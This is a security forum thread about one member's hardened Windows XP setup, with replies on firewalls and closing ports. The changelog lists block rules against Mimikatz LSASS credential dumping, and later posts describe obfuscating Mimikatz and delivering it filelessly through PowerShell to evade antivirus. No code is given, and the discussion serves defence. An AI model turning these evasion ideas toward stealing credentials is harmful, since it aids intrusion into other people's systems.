Status
Not open for further replies.
Latest changes
Dec 26, 2019
Operating system
Not listed
System type
32-bit operating system; x86-based processor
Update and Security
No security updates
User Access Control
Notify me only when programs try to make changes to my computer
Firewall and Network protection
Microsoft Defender Firewall is active
User permissions
Administrator account
User account
Local account only
Sign-in options
  • Account Password
  • Malware exposure
    No malware samples are downloaded
    Real-time Malware protection
    • Windows Firewall
    • Firewall Hardware on router
    • 1° AdGuard DNS / 2° CloudFlare DNS
    • MBAE Premium - Custom Setting
    • OSA - Custom Setting
    • Black Viper's List - Some services Disabled/Manual
    Modified security settings
    • Trick POS Ready 2009 + KB4500331.
    • PsExec - Run browsers + email client with limited rights - Exceptions (OSA) for Interlink Mail News and New Moon.
    • DEP Always ON
    • SMB Protocol Disabled
    • No NET Framework Installed
    • I.E.8 No Flash + Trick 1803 (Block the downloadable executable files) + Disable script (F12 - on/off) + block execution I.E.8.
    Periodic scanners
    Hitman Pro,McAfee Stinger,HijackThis Portable,Adwcleaner v.6.0.4.7
    Browser and Extensions
    New Moon 28 - (Pale Moon fork for Windows XP) Custom Setting about:config

    • Noscript
    • U.B.O.Legacy
    • Decentraleyes
    • No Resource URI Leak
    • Canvas Blocker Legacy 0.2 - Only to pass the ClientRects Fingerprint test
    Privacy tools and VPN
    • 1° AdGuard DNS / 2° CloudFlare DNS
    • W.M.P. off
    • O.E. off
    • New Moon Home page = DuckDuckGO - Custom settings saved via URL no cookies
    Password manager
    My Memory
    Search engine
    DuckDuckGo
    Maintenance tools
    • CCleaner - Many custom rules created by me
    • RegSekeer
    • Process Explorer
    • SigcheckGUI
    • Dependency Walker
    • CFF Explorer
    • Currports
    • WWDC
    • IobitUnistaller Portable
    • Speedyfox -Custom Rule for Interlink Mail News
    • SUMo Portable
    • JKDefragGUI
    Photos and Documents backup
    Pen Drive
    Data Backup Schedule
    Once or multiple times per month
    Backup and Restore
    Acer System Backup
    Backup Schedule
    Once or more per year
    Computer Activity
  • Online banking
  • Browsing the web and checking emails
  • Office and other work-related software (Work from Home)
  • Learning computer languages or creating apps
  • Computer Specifications
    Acer Intel Celeron M380 1.60 GHz 1GB RAM
    Your changelog
    1. Added some custom rules in OSA for Mimikatz Dump Lsass.exe mitigation.
    2. Added "sc" command rule block in OSA.
    3. Added rule to block execution of I.E.8 in OSA.
    4. Added rule to block msbuild.exe in OSA and the same rule on the Registry Key.
    5. Blocking rule in host file for CCleaner.
    Staff notes

    This setup configuration may put your device at risk .
    We don't recommend that other members use this security setup. We cannot be held responsible for problems that may occur to your device by using this security setup.

    This computer configuration is using an unsupported operating system. If possible, we recommend to upgrade to an operating system that is supported by its developers.

    DDE_Server

    Level 20
    Verified
    I would not use the Windows firewall I would use Sygate Personal Firewall is the best program I have tried in many years.
    If you want good firewall there are two solutions which are knows (sophos and fortigate ).however they are expensive however if I could afford I will by UTM instead :ROFLMAO: :ROFLMAO:

    Firewall combjned by other proactive features such as IDS and IPS and central. Management
     

    Sampei Nihira

    Level 6
    Verified
    What is the point of using old OS with tons of security programs to patch all vulnerabilities when Windows 10 protect computer from vulnerabilities by default?
    I also use Windows 10.
    At this moment I am at home and I am answering your question from the PC with Windows 10.

    You will be surprised to know that there are still users who use Windows 2000,XP, Vista, but also Windows 7 and later OS.
    Example my colleague "Win32" on the MSFN forum:

     
    Last edited:

    Raiden

    Level 17
    Verified
    Content Creator
    If you want good firewall there are two solutions which are knows (sophos and fortigate ).however they are expensive however if I could afford I will by UTM instead :ROFLMAO: :ROFLMAO:

    Firewall combjned by other proactive features such as IDS and IPS and central. Management

    You could build your own for much cheaper. If you have an old desktop laying around that you aren't using, you could put something like Sophos XG home, pfsense, etc.. on it and you have yourself a sweet hardware firewall with all those features.;)
     

    Sampei Nihira

    Level 6
    Verified
    A look over there is like going back in time. These people are serious about their dinosaurs! ;):LOL:
    :D

    Instead it is a great satisfaction.
    For example, I was very happy to have set my I.E.8 as the image below:

    110.JPG
    110a.JPG


    Even if I never use it.
    By the way, we want to discuss the "Session Ticket Support" parameter.
    If you pass the test with your browsers it is not always a good thing
     
    Last edited:

    Prorootect

    Level 53
    Verified
    Surely you've disabled NetBIOS over TCP/IP (all interfaces)? - and disabled ports 135, 137-139, 445 ... type netstat -an in a command prompt window to look eventually for your opened ports...
    - so use "Seconfig XP" v1.1 - small but powerful software by Davis Mosenkovs; download link on Softpedia: Download Seconfig XP 1.1
    Good read: How to disable Ports 135, 137-139, 445 (Windows XP): How to disable Ports 135, 137-139, 445 (Windows XP)
     

    ichito

    Level 9
    Verified
    Content Creator
    - so use "Seconfig XP" v1.1 - small but powerful software by Davis Mosenkovs; download link on Softpedia: Download Seconfig XP 1.1
    Still on board on my XP as the support of Kerio FW Free 2.1.5...yess...I'm using firewall from 2004 so...could I feel like dinosaur? :) As already mentioned - there still to get a few firewalls from the past e.g. Kerio, Sygate, Sunbelt, NetVeda SN, Filseclab, Outpost, PCTools, Prvatefirewall or even the last free Online Armor from Tall Emu but nowadyas we have nice firewall that is Free also - SpyShelter Free v.12. It' s for sure worth of attention.
     

    Sampei Nihira

    Level 6
    Verified
    Surely you've disabled NetBIOS over TCP/IP (all interfaces)? - and disabled ports 135, 137-139, 445 ... type netstat -an in a command prompt window to look eventually for your opened ports...
    - so use "Seconfig XP" v1.1 - small but powerful software by Davis Mosenkovs; download link on Softpedia: Download Seconfig XP 1.1
    Good read: How to disable Ports 135, 137-139, 445 (Windows XP): How to disable Ports 135, 137-139, 445 (Windows XP)
    Look in my configuration.
    System Utilities - WWDC
    Windows Worms Doors Cleaner
    If you search on the net do in part what you wrote ;)
     
    F

    ForgottenSeer 823865

    To be honest I don't see, in my case, what a 3rd party firewall afford more than Windows Firewall, pop-up alert when outbound connection is created? No need, I block all outbound connections at fitst then create manually my own rules.
     
    F

    ForgottenSeer 823865

    How to find it then :ROFLMAO: :ROFLMAO:
    You can't by normal means. Maybe via a corporate firewall that has IPS/IDS or by dll monitoring.
    I remember a "colleague" , showing me in real time how to evade AVs using obfuscated Mimikatz. The initial detection was originally like 15+ engines detecting it, and just by changing mimikatz attributes, it gradually went to zero detection... If I remember ESET was the last one.
    Now couple it with true fileless/in-memory delivery techniques or a kernel exploit and your traditional security softs whatever awesome default-deny or AV will fail.
    Why do you think corporations invest in very expensive business solutions (which are often hardware based)? And even with them, they still get breached. So I laugh when some home users products claimed to stop all malwares when basic true exploits are just enough to beat them...Yes they may stop your ordinary malware, not the complex ones like I saw.

    Of course you won't see such stuff around every corner, some will say, they will never cross them (which is probably true), but we aren't in a security forum for Average Joe threats, we are here to learn how about sophisticated ones and how to protect ourselves against them.
     
    Last edited by a moderator:

    Andy Ful

    Level 59
    Verified
    Trusted
    Content Creator
    In-memory Mimikatz can be delivered filelessly via PowerShell (Invoke-Mimikatz.ps1). It can be obfuscated to avoid AV detection. It can be dangerous for enterprises. In the home environment, any true fileless malware must be started by the exploit which makes it far less possible than in enterprises, except when someone uses vulnerable (not patched) system/software.
     

    Andy Ful

    Level 59
    Verified
    Trusted
    Content Creator
    I don't have the Powershell "problem".
    And Mimikatz creates more problems for your OS after XP.
    The attacker is hardly inclined to consider the 32-bit compromised PC.
    I know. You even do not have PowerShell installed. :)
    Mimikatz works on Windows XP. The exploit kit does not consider anything - it will attack any vulnerable system if only the right module is available.
    Anyway, my post was related to the @Umbra post. Both were not related to your config, but they had a rather general meaning.(y)
     
    Last edited:

    Sampei Nihira

    Level 6
    Verified
    I know. You even do not have PowerShell installed. :)
    Mimikatz works on Windows XP. The exploit kit does not consider anything - it will attack any vulnerable system if only the right module is available.
    Anyway, my post was related to the @Umbra post. Both were not related to your config, but they had a rather general meaning.(y)
    Yes, but I would like to broaden the discussion since Umbra mentioned it.
    I know Mimikatz works on Windows XP.
    Even on a compromised Windows XP it could even silently install Powershell 2.

    If there is someone who is interested in the discussion, he can refer to the 3D below:


    I speak from page 8 but the previous pages are also interesting.
    Final conclusion.
    In my PC, even in case of compromise of the OS (absurd hypothesis) Mimikatz could not act.
     
    Last edited:
    Status
    Not open for further replies.
    Top